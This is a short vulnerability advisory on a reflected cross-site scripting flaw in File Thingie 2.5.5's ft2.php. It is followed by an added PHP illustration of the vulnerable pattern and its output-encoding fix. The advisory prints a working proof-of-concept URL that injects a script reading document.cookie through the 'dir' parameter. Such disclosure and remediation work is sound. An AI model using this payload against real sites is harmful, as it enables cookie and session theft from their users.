[#]----------------------------------------------------------------------------------------]
[#] Title: File Thingie v2.5.5 XSS Vulnerability
[#] Author: Jeremiah Talamantes (RedTeam Security)
[#] Website: http://www.redteamsecure.com/labs
[#] Date: 5/15/2010
[#]
[#] Application: File Thingie
[#] Version: 2.5.5
[#] Link: http://www.solitude.dk/filethingie/download
[#] Description: The vulnerability exists due to a failure in the "ft2.php" script
[#] to properly sanitize data. Successful compromise could result in theft of
[#] cookie data.
[#]----------------------------------------------------------------------------------------]

[ EXPLOIT POC ---------------------------------------------------------------------------------]

http://example.com/ft2.php?dir=2%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

[ EXPLOIT POC ---------------------------------------------------------------------------------]
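
Added example, not part of the original advisory and not File Thingie source code: the reflected pattern the PoC implies, next to its output-encoding fix. It assumes the "dir" value is echoed into a double-quoted HTML attribute; the form markup and all function names are hypothetical.

```php
<?php
// Added illustration; not File Thingie source code.
// Assumption: "dir" is reflected inside a double-quoted HTML attribute.
// The markup and function names below are hypothetical.

// Vulnerable pattern: request data concatenated straight into the attribute.
function render_dir_field_unsafe(string $dir): string
{
    return '<input type="hidden" name="dir" value="' . $dir . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES encodes both quote styles, so the value cannot close the attribute.
function render_dir_field_safe(string $dir): string
{
    $encoded = htmlspecialchars($dir, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="dir" value="' . $encoded . '">';
}

// Defense in depth: reject values that cannot be a directory name at all.
// The allow-list is an assumption about what a legitimate "dir" looks like.
function is_plausible_dir(string $dir): bool
{
    return $dir === '' || preg_match('#^[A-Za-z0-9 _./-]+$#', $dir) === 1;
}

// The "dir" value from the PoC URL in the advisory, URL-decoded.
$dir = urldecode('2%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E');

// Unsafe rendering: the quote and bracket in the value end the attribute early.
echo render_dir_field_unsafe($dir), "\n";

// Safe rendering: the same value stays inside the attribute as inert text.
echo render_dir_field_safe($dir), "\n";

// Input validation result for the PoC value and for a constructed benign value.
var_dump(is_plausible_dir($dir));
var_dump(is_plausible_dir('docs/2010'));
```

Encoding at the point of output is the fix; the allow-list only narrows what reaches it. Marking the session cookie HttpOnly additionally keeps it out of document.cookie if an encoding gap is missed elsewhere.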